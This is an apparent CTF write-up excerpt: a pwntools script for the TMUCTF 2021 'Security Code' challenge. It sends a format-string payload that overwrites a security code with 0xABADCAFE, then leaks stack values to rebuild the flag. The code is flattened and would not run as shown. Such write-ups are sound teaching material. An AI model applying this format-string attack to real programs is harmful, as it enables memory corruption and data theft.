Rating:
```python
from pwn import *
flag = ''
# We will hit program for 30 iterations (just a number to get all available characters in flag)
# And in each try will change offset of getting flag value.
for i in range(30):
# First we will connect to program using pwntools methods.
# r = process("./securitycode")
r = remote('185.97.118.167', 7040)
# First Send A to be forwarded to hello_admin
r.recvuntil("Enter 'A' for admin and 'U' for user.")
r.sendline('A')
# Value to overwrite is: xABADCAFE
# ABAD: 43949
# CAFE: 51966
# So we need to first write this value in location of security_code address,
# But cause it's more than two bytes, we will try to write two times in our format string payload.
# cause CAFE is of a higher value we should first write it in location 15 from stack
r.recvuntil('Enter you name:')
payload = '\x3e\xc0\x04\x08\x3c\xc0\x04\x08%43941x%15$hn%8017x%16$hn'
r.sendline(payload)
# Now try to read of the flag step by step
r.recvuntil('Enter your password:')
payload = '%{}$x'.format(i)
r.sendline(payload)
x = r.recvline()
x += r.recvline()
x += r.recvline()
x = x.replace('The password is ', '').strip()
# it's just a method i used, it's not very clean, but got me the flag :)!
try:
flag += bytearray.fromhex(x).decode()[::-1]
except:
pass
print(flag)
```
[Original Writeup with more details](https://github.com/Execut3/CTF-WriteUps/tree/master/2021/TMUCTF/Pwn/Security%20Code)
